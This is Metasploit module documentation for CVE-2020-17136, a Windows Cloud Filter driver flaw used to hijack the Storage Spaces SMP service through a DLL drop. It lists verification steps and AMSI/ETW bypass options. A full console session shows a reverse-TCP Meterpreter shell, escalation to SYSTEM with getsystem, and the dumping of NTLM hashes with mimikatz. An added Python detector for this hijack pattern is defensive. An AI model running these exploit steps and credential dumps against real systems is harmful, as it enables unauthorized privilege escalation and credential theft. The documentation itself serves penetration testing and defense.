metasploit-gs/documentation/modules/exploit/windows/local/cve_2020_17136.md
## Vulnerable Application
The Cloud Filter driver, `cldflt.sys`, on Windows 10 v1803 and later, prior to the December 2020 updates,
did not set the `IO_FORCE_ACCESS_CHECK` and `OBJ_FORCE_ACCESS_CHECK` flags when calling
`FltCreateFileEx()` and `FltCreateFileEx2()` within its `HsmpOpCreatePlaceholders()` function with attacker
controlled input. This meant that files were created with `KernelMode` permissions, which bypasses the
access checks that would otherwise stop a normal user from creating files in directories where they have
no write permission.
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
the `SYSTEM` user.
### Installation And Setup
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
## Verification Steps
1. Start msfconsole
2. Get a shell as a low privileged user.
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
4. `use exploit/windows/local/cve_2020_17136`
5. `set session *session id*`
6. `run`
7. **Verify** that you get a new shell as the `NETWORK SERVICE` user
## Options
### AMSIBYPASS
Enable or disable AMSI bypass.
### ETWBYPASS
Enable or disable ETW bypass.
### WAIT
Time in seconds to wait before starting to read the text output from the injected C# exe.
## Scenarios
### Windows 10 2004 x64 - Build 19041.630 with cldflt.sys version 10.0.19041.488
```
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600
meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > show options
Module options (exploit/windows/local/cve_2020_17136):
Name Current Setting Required Description
---- --------------- -------- -----------
AMSIBYPASS true yes Enable Amsi bypass
ETWBYPASS true yes Enable Etw bypass
SESSION 1 yes The session to run this module on.
WAIT 5 no Time in seconds to wait
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows DLL Dropper
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
LHOST => 172.22.159.28
msf6 exploit(windows/local/cve_2020_17136) > run
[*] Started reverse TCP handler on 172.22.159.28:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 100 launched.
[*] Reflectively injecting the Host DLL into 100..
[*] Injecting Host into 100...
[*] Host injected. Copy assembly into 100...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2733760425760
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
normal DESKTOP-KUO5CML a38673ad58b19421e952fc317b62c3c4 ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test DESKTOP-KUO5CML 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DESKTOP-KUO5CML$ WORKGROUP (null)
normal DESKTOP-KUO5CML (null)
test DESKTOP-KUO5CML (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
desktop-kuo5cml$ WORKGROUP (null)
normal DESKTOP-KUO5CML (null)
test DESKTOP-KUO5CML (null)
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2020_17136) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)
msf6 exploit(windows/local/cve_2020_17136) >
```
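The hijack stage described under Vulnerable Application leaves a distinctive trace in the scenario above: a service process running as `NETWORK SERVICE` loads an unsigned DLL from `C:\Windows\Temp`, a directory a low-privileged user can write to. The following detector is an added example written for this page; it is not part of the Metasploit module or its documentation. It runs over constructed, Sysmon-like image-load records in a `key=value|key=value` format that is an assumption of this example, as are `svchost.exe` as the hosting process and the list of user-writable directories. The drop path in the first sample record is the one shown in the scenario output.

```python
"""Flag unsigned DLLs loaded from user-writable directories by service-account
processes: the pattern the DLL-hijack stage of this module produces.

Added example, not code from the Metasploit module. The record format, the
sample records, and the directory/account lists are assumptions made here.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Directories a low-privileged user can normally write to (assumed list).
WRITABLE_DIR_PATTERNS = [
    re.compile(r"^c:\\windows\\temp\\", re.IGNORECASE),
    re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.IGNORECASE),
    re.compile(r"^c:\\programdata\\", re.IGNORECASE),
]

# Accounts a hijacked service hands to the attacker (matched case-insensitively).
SERVICE_ACCOUNTS = {
    r"nt authority\network service",
    r"nt authority\local service",
    r"nt authority\system",
}


@dataclass(frozen=True)
class ImageLoad:
    image: str    # process that performed the load
    user: str     # account the process runs as
    loaded: str   # full path of the loaded DLL
    signed: bool  # whether the DLL carried a valid signature


def parse_record(line: str) -> Optional[ImageLoad]:
    """Parse one 'Key=Value|Key=Value' record; return None on malformed input."""
    fields = {}
    for part in line.strip().split("|"):
        if "=" not in part:
            return None
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    try:
        return ImageLoad(
            image=fields["image"],
            user=fields["user"],
            loaded=fields["imageloaded"],
            signed=fields.get("signed", "false").lower() == "true",
        )
    except KeyError:
        return None


def is_suspicious(rec: ImageLoad) -> bool:
    """True when a service-account process loads an unsigned DLL from a writable dir."""
    from_writable = any(p.search(rec.loaded) for p in WRITABLE_DIR_PATTERNS)
    as_service = rec.user.lower() in SERVICE_ACCOUNTS
    return from_writable and as_service and not rec.signed


def scan(lines: List[str]) -> List[str]:
    """Return the DLL paths of every record matching the hijack pattern."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is not None and is_suspicious(rec):
            hits.append(rec.loaded)
    return hits


# Constructed sample records. Only the first one should be flagged: the second is
# a signed system DLL, the third is the attacker's own notepad.exe CLR host running
# as the low-privileged user (out of scope for this rule), the fourth is malformed,
# and the fifth is a signed DLL, which the rule deliberately lets through.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\svchost.exe|User=NT AUTHORITY\NETWORK SERVICE|ImageLoaded=C:\Windows\Temp\BXNkequQiAvYxuVp.dll|Signed=false",
    r"Image=C:\Windows\System32\svchost.exe|User=NT AUTHORITY\NETWORK SERVICE|ImageLoaded=C:\Windows\System32\kernel32.dll|Signed=true",
    r"Image=C:\Windows\System32\notepad.exe|User=DESKTOP-KUO5CML\normal|ImageLoaded=C:\Users\normal\AppData\Local\Temp\host.dll|Signed=false",
    r"this line is not a record",
    r"Image=C:\Windows\System32\svchost.exe|User=NT AUTHORITY\SYSTEM|ImageLoaded=C:\ProgramData\Vendor\plugin.dll|Signed=true",
]

if __name__ == "__main__":
    for path in scan(SAMPLE_LOG):
        print("suspicious service DLL load:", path)
```

The rule is intentionally narrow: it keys on the service side of the hijack (account plus load location plus missing signature) rather than on the `notepad.exe` CLR host, which runs as the original low-privileged user and looks like ordinary user activity. Dropping the signature condition catches more but will also flag legitimately installed, unsigned plug-ins under `C:\ProgramData`, so tune the directory list to the host before deploying it.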